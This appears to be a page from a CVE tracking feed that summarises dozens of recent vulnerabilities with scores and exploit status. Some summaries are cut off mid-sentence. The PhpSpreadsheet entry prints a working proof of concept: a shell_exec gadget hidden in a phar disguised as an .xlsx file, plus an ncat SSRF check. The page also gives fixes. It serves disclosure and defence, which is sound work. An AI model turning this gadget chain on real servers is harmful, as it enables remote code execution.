Skip to main content
CVE-2026-41940 CRITICAL POC KEV EUVD KEV PATCH THREAT NEWS Act Now

Authentication bypass in cPanel & WHM allows unauthenticated remote attackers to gain unauthorized access to the control panel by exploiting a flaw in the login flow. The vulnerability is confirmed actively exploited (CISA KEV) with publicly available exploit code, an EPSS score of 16.52% (95th percentile), and affects multiple long-term support branches of cPanel & WHM as well as WP Squared. Given that cPanel administers shared hosting environments, successful exploitation typically grants attackers control over many downstream customer sites.

Authentication Bypass Cpanel Whm Wp Squared
NVD GitHub VulDB Exploit-DB
CVSS 4.0
9.3
EPSS
16.5%
Threat
5.4
CVE-2018-25318 CRITICAL POC Act Now

Tenda FH303/A300 firmware V5.07.68_EN contains a session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient cookie validation. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Authentication Bypass Tenda
NVD Exploit-DB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2018-25317 CRITICAL POC Act Now

Tenda W3002R/A302/W309R wireless routers version V5.07.64_en contain a cookie session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Authentication Bypass Tenda
NVD Exploit-DB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2018-25316 CRITICAL POC Act Now

Tenda W308R v2 V5.07.48 contains a cookie session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient session validation. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Authentication Bypass Tenda
NVD Exploit-DB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-42031 HIGH POC PATCH GHSA This Week

A vulnerability in `datastore_search_sql` allowed attackers to inject SQL in order to gain access to private resources and PostgreSQL system information. The issue has been patched in CKAN 2.10.10 and CKAN 2.11.5 Disable the DataStore SQL search (`ckan.datastore.sqlsearch.enabled = false`). Note that the SQL search is disabled by default. As stated in the [documentation](https://docs.ckan.org/en/2.11/maintaining/configuration.html#ckan-datastore-sqlsearch-enabled), this action function has protections that offer some safety but are not designed to prevent all types of abuse. Depending on the sensitivity of private data in a project's DataStore and the likelihood of abuse of a consuming site, a developer may choose to disable this action function or restrict its use with a [`IAuthFunctions`](https://docs.ckan.org/en/2.11/extensions/plugin-interfaces.html#ckan.plugins.interfaces.IAuthFunctions) plugin. * Reported by Arvin Shivram of Brutecat Security

PostgreSQL SQLi
NVD GitHub VulDB
CVSS 4.0
8.3
EPSS
3.1%
CVE-2018-25300 HIGH POC This Week

XATABoost CMS 1.0.0 contains a union-based SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the id parameter. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

SQLi PHP
NVD Exploit-DB
CVSS 4.0
8.8
EPSS
0.1%
CVE-2018-25308 HIGH POC This Week

BuddyPress Xprofile Custom Fields Type 2.6.3 contains a remote code execution vulnerability that allows authenticated users to delete arbitrary files by manipulating unescaped POST parameters. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

Path Traversal RCE Buddypress Xprofile Custom Fields Type
NVD Exploit-DB
CVSS 4.0
8.7
EPSS
0.2%
CVE-2026-34965 HIGH POC This Week

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via include() to achieve arbitrary command execution on the underlying server.

PHP Code Injection RCE
NVD GitHub
CVSS 4.0
8.7
EPSS
0.4%
CVE-2018-25307 HIGH POC This Week

SysGauge Pro 4.6.12 contains a local buffer overflow vulnerability in the Register function that allows local attackers to overwrite the structured exception handler by supplying a crafted unlock. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Sysgauge Pro
NVD Exploit-DB VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25315 HIGH POC This Week

Alloksoft Video joiner 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Video Joiner
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25314 HIGH POC This Week

Allok soft WMV to AVI MPEG DVD WMV Converter 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized string in the License. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Wmv To Avi Mpeg Dvd Wmv Converter
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25303 HIGH POC This Week

Allok Video to DVD Burner 2.6.1217 contains a stack-based buffer overflow vulnerability in the License Name field that allows local attackers to execute arbitrary code by triggering a structured. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

RCE Buffer Overflow Stack Overflow Allok Video To Dvd Burner
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25301 HIGH POC This Week

Easy MPEG to DVD Burner 1.7.11 contains a structured exception handling (SEH) local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Easy Mpeg To Dvd Burner
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25299 HIGH POC This Week

Prime95 29.4b8 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting structured exception handling (SEH) mechanisms. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Prime95
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25304 HIGH POC This Week

Free Download Manager 2.0 Built 417 contains a local buffer overflow vulnerability in the URL import functionality that allows attackers to trigger a structured exception handler (SEH) chain. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Free Download Manager
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25302 HIGH POC This Week

Allok AVI to DVD SVCD VCD Converter 4.0.1217 contains a structured exception handling (SEH) based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a. Rated high severity (CVSS 8.5), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Allok Avi To Dvd Svcd Vcd Converter
NVD Exploit-DB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-37555 HIGH POC PATCH This Week

An issue was discovered in libsndfile 1.2.2 IMA ADPCM codec. The AIFF code path (line 241) was fixed with (sf_count_t) cast, but the WAV code path (line 235) and close path (line 167) were not. When samplesperblock (int) * blocks (int) exceeds INT_MAX, the 32-bit multiplication overflows before being assigned to sf.frames (sf_count_t/int64). With samplesperblock=50000 and blocks=50000, the product 2500000000 overflows to -1794967296. This causes incorrect frame count leading to heap buffer overflow or denial of service. Both values come from the WAV file header and are attacker-controlled. This issue was discovered after an incomplete fix for CVE-2022-33065.

Buffer Overflow Integer Overflow Denial Of Service Libsndfile
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-7420 HIGH POC This Week

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

Buffer Overflow Hiper 1250Gw
NVD VulDB GitHub
CVSS 4.0
7.4
EPSS
0.0%
CVE-2026-7419 HIGH POC This Week

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

Buffer Overflow Hiper 1250Gw
NVD VulDB GitHub
CVSS 4.0
7.4
EPSS
0.0%
CVE-2026-7418 HIGH POC This Week

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.

Buffer Overflow Hiper 1250Gw
NVD VulDB GitHub
CVSS 4.0
7.4
EPSS
0.0%
CVE-2018-25312 HIGH POC This Week

LifeSize ClearSea 3.1.4 contains directory traversal vulnerabilities that allow authenticated attackers to download and upload arbitrary files by manipulating path parameters in the smartgui. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

Path Traversal RCE Clearsea
NVD Exploit-DB
CVSS 4.0
7.1
EPSS
0.7%
CVE-2018-25311 HIGH POC This Week

VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows authenticated attackers to disclose arbitrary files by injecting path traversal. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

Path Traversal Videoflow Digital Video Protection
NVD Exploit-DB
CVSS 4.0
7.1
EPSS
0.3%
CVE-2018-25298 MEDIUM POC This Month

Merge PACS 7.0 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized actions by crafting malicious HTML forms targeting the merge-viewer endpoint. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

CSRF Authentication Bypass Merge Pacs
NVD Exploit-DB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2018-25313 MEDIUM POC This Month

SysGauge 4.5.18 contains a buffer overflow vulnerability in the proxy configuration handler that allows local attackers to cause a denial of service by supplying an oversized string. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Sysgauge
NVD Exploit-DB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2018-25305 MEDIUM POC This Month

librsvg2-bin 2.40.13 contains a buffer overflow vulnerability that allows local attackers to cause a denial of service by processing malformed SVG files. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Rsvg
NVD Exploit-DB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2018-25306 MEDIUM POC This Month

PDFunite 0.41.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by processing malformed PDF files during merge operations. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow Pdfunite
NVD Exploit-DB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-26015 CRITICAL PATCH Act Now

DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0.

Command Injection RCE Docsgpt
NVD GitHub VulDB
CVSS 4.0
10.0
EPSS
0.3%
CVE-2026-3325 CRITICAL Act Now

SQL injection (SQLi) in MegaCMS v12.0.0, specifically in the “id_territorio” parameter of the “/web_comunications/cms/get_provincias” endpoint. The vulnerability arises from inadequate validation and sanitisation of user input. Specifically, via a POST request, the “id_territorio” parameter, used immediately after the registration form is submitted, could be manipulated by an unauthenticated attacker to execute arbitrary SQL queries.

SQLi
NVD VulDB
CVSS 4.0
10.0
EPSS
0.0%
CVE-2026-38992 CRITICAL PATCH GHSA Act Now

Remote code execution in Cockpit CMS versions 2.13.5 and earlier allows unauthenticated attackers to execute arbitrary system commands on the server by injecting malicious payloads through the filter parameter across multiple endpoints. The vulnerability exploits the MongoLite database layer's $func operator, which processes user-controlled input as executable code. Public proof-of-concept exists and the attack is fully automatable with total system compromise potential, though EPSS scoring suggests limited observed exploitation attempts (2nd percentile) at time of analysis.

Code Injection RCE N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-36841 CRITICAL Act Now

Remote unauthenticated command injection in TOTOLINK N200RE V5 router allows complete device compromise via formMapDelDevice function. Attackers can execute arbitrary OS commands by injecting malicious payloads into the macstr or bandstr parameters with no authentication required (CVSS 9.8, AV:N/AC:L/PR:N/UI:N). Public proof-of-concept code exists per SSVC framework (exploitation: poc), making this immediately weaponizable against internet-facing devices. EPSS data unavailable, but CVSS vector and POC availability indicate critical real-world risk for consumer routers with default configurations exposed to the internet.

Command Injection
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-7443 MEDIUM POC This Month

A weakness has been identified in BurtTheCoder mcp-dnstwist up to 1.0.4. Affected by this vulnerability is the function fuzz_domain of the file src/index.ts of the component MCP Interface. Executing a manipulation of the argument Request can lead to os command injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

Command Injection Mcp Dnstwist
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.8%
CVE-2026-5166 CRITICAL PATCH Act Now

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal. This issue affects Pardus Software Center: before 1.0.3.

Path Traversal Pardus Software Center
NVD VulDB
CVSS 3.1
9.6
EPSS
0.0%
CVE-2026-7416 MEDIUM POC This Month

OS command injection in PolarVista xcode-mcp-server 1.0.0 allows remote unauthenticated attackers to execute arbitrary system commands via crafted MCP requests to the build_project or run_tests functions. The vulnerability stems from insufficient input validation in src/index.ts when processing Request parameters. A publicly available exploit code exists (GitHub), and the vendor has not responded to early vulnerability disclosure attempts, leaving users without an official patch. EPSS data not available, but public exploit combined with network-accessible attack vector (CVSS AV:N/AC:L/PR:N) indicates elevated real-world risk for exposed instances.

Command Injection Xcode Mcp Server
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.2%
CVE-2026-7417 MEDIUM POC This Month

A vulnerability was found in Algovate xhs-mcp 0.8.11. This affects the function xhs_publish_content of the file src/server/mcp.server.ts of the component MCP Interface. Performing a manipulation of the argument media_paths results in server-side request forgery. The attack may be initiated remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.

SSRF Xhs Mcp
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7404 MEDIUM POC This Month

Path traversal in mcpo-simple-server 0.2.0 and earlier enables unauthenticated remote attackers to delete arbitrary files via the delete_shared_prompt function. The vulnerability affects the prompt_manager module's base_manager.py file, where improper validation of the 'detail' parameter allows directory traversal sequences. A public proof-of-concept exploit exists (GitHub issue #4), making this an immediate threat to internet-exposed instances. EPSS data not available, but the combination of network exploitability (AV:N), no authentication required (PR:N), and public POC significantly elevates real-world risk despite moderate CVSS 7.3 score. Vendor has not responded to early disclosure.

Path Traversal Mcpo Simple Server
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7403 MEDIUM POC This Month

Path traversal in geldata gel-mcp 0.1.0 allows remote unauthenticated attackers to read arbitrary files via manipulation of the rule_name argument in the list_rules and fetch_rule functions. The vulnerability has a CVSS score of 5.3 (Low confidentiality impact) with network accessibility and no authentication requirements. Public exploit code exists and the vendor has not responded to early disclosure.

Path Traversal Gel Mcp
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7400 MEDIUM POC PATCH This Month

A security vulnerability has been detected in geekgod382 filesystem-mcp-server 1.0.0. This issue affects the function is_path_allowed of the file server.py of the component read_file_tool/write_file_tool. Such manipulation leads to path traversal. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 1.1.0 is capable of addressing this issue. The name of the patch is 45364545fc60dc80aadcd4379f08042d3d3d292e. Upgrading the affected component is advised.

Path Traversal Filesystem Mcp Server
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.1%
CVE-2026-7398 MEDIUM POC This Month

A weakness has been identified in florensiawidjaja BioinfoMCP up to 7ada7918b9e515604d3c0ae264d3a9af10bf6e54. This vulnerability affects the function Upload of the file bioinfo_mcp_platform/app.py of the component Upload Endpoint. This manipulation of the argument Name causes path traversal. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.

Path Traversal Bioinfomcp
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7396 MEDIUM POC This Month

A vulnerability was identified in NousResearch hermes-agent 0.8.0. Affected by this issue is some unknown functionality of the file gateway/platforms/wecom.py of the component WeChat Work Platform Adapter. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

Path Traversal Hermes Agent
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7386 MEDIUM POC PATCH This Month

A flaw has been found in fatbobman mail-mcp-bridge up to 1.3.3. Affected is an unknown function of the file src/mail_mcp_server.py. Executing a manipulation of the argument message_ids can lead to path traversal. The attack can be executed remotely. The exploit has been published and may be used. Upgrading to version 1.3.4 is able to address this issue. This patch is called 638b162b26532e32fa8d8047f638537dbdfe197a. Upgrading the affected component is recommended.

Path Traversal Mail Mcp Bridge
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.1%
CVE-2026-7384 MEDIUM POC This Month

A vulnerability was detected in ezequiroga mcp-bases 357ca19c7a49a9b9cb2ef639b366f03aba8bea39/c630b8ab0f970614d42da8e566e9c0d15a16414c. This impacts the function search_papers of the file research_server.py. Performing a manipulation of the argument topic results in path traversal. Remote exploitation of the attack is possible. The exploit is now public and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.

Path Traversal Mcp Bases
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-42231 CRITICAL PATCH GHSA Act Now

Prototype pollution in n8n's XML webhook parser (xml2js library) enables remote code execution when chained with Git node SSH operations. Authenticated users with workflow editing permissions can inject malicious XML payloads to pollute JavaScript object prototypes, then leverage the polluted prototype in Git node operations to execute arbitrary code on the n8n host server. GitHub advisory GHSA-q5f4-99jv-pgg5 confirms patches available in versions 1.123.32, 2.17.4, and 2.18.1. No CISA KEV listing or public POC identified at time of analysis, but the CVSS 10.0 score appears inconsistent with the authenticated (PR:L expected) nature described in the advisory.

RCE Prototype Pollution
NVD GitHub VulDB
CVSS 4.0
9.4
EPSS
0.5%
CVE-2026-42232 CRITICAL PATCH GHSA Act Now

Prototype pollution in n8n's XML node allows authenticated workflow editors to achieve remote code execution through global prototype manipulation. The vulnerability affects n8n workflow automation platform versions prior to 1.123.32, 2.17.4, and 2.18.1, enabling attackers with workflow creation privileges to inject malicious properties into JavaScript object prototypes that can be exploited by other nodes to execute arbitrary code. Vendor-released patches are available for all affected version branches. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the CVSS 10.0 score reflects the critical scope change and complete system compromise potential.

Prototype Pollution Information Disclosure
NVD GitHub VulDB
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-41586 CRITICAL GHSA Act Now

Remote code execution in Hyperledger fabric-sdk-java (all versions 1.0.0 through 2.2.26) allows unauthenticated attackers to execute arbitrary commands via malicious serialized Java objects. The deprecated SDK's Channel.java class deserializes untrusted byte arrays without input filtering in readObject() and deSerializeChannel() methods, enabling classic Java gadget chain exploitation. Publicly available exploit code exists (ysoserial toolkit), and exploitation requires only that an application accept Channel serialization data from attacker-controlled sources such as compromised files, external APIs, or injected parameters. EPSS data unavailable; not listed in CISA KEV. Vendor has published GHSA advisory but provides no patch-remediation requires migration to the replacement fabric-gateway SDK.

Deserialization Java
NVD GitHub
CVSS 4.0
9.3
EPSS
0.0%
CVE-2018-25310 MEDIUM POC This Month

VideoFlow Digital Video Protection DVP 2.10 contains an authenticated remote code execution vulnerability that allows authenticated attackers to execute arbitrary system commands by exploiting a. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

CSRF RCE Videoflow Digital Video Protection
NVD Exploit-DB
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-34084 CRITICAL PATCH GHSA Act Now

{ public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.

PHP Microsoft SSRF Deserialization
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.1%
CVE-2018-25309 MEDIUM POC This Month

MyBB Recent threads 17.0 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts by creating threads with crafted subject lines. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Mybb Recent Threads
NVD Exploit-DB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-7381 CRITICAL Act Now

Plack::Middleware::XSendfile through version 1.0053 allows remote unauthenticated attackers to read arbitrary files from nginx-proxied servers by injecting malicious X-Sendfile-Type and X-Accel-Mapping headers. When the middleware's sendfile type is not explicitly configured, clients can force nginx's X-Accel-Redirect mode and manipulate path mappings to access sensitive files outside intended directories. The middleware has been deprecated as of version 1.0053 and will be removed in future Plack releases. EPSS score of 0.01% suggests low current exploitation activity despite the high CVSS 9.1 rating. No public exploit code identified at time of analysis, though the attack technique mirrors the documented CVE-2025-61780 vulnerability in Rack::Sendfile.

Information Disclosure Nginx
NVD VulDB
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-30893 CRITICAL POC PATCH Act Now

Wazuh Manager (4.4.0 through 4.14.3) contains a path traversal vulnerability in the cluster synchronization routine that allows an authenticated cluster peer to write arbitrary files outside the intended extraction directory on other cluster nodes. Writing to sensitive locations such as cron directories or Python module paths leads to remote code execution. CVSS 9.0 Critical (network-accessible, high privilege required, scope changed). Patch available in v4.14.4; no active exploitation identified.

RCE Python Path Traversal Wazuh
NVD GitHub VulDB
CVSS 3.1
9.0
EPSS
0.1%
CVE-2026-42523 CRITICAL PATCH GHSA Act Now

Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job URL as part of JavaScript implementing validation of the feature "GitHub hook trigger for GITScm polling", resulting in a stored cross-site scripting (XSS) vulnerability exploitable by non-anonymous attackers with Overall/Read permission.

Jenkins XSS
NVD VulDB
CVSS 3.1
9.0
EPSS
0.0%
Page 1 of 4 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy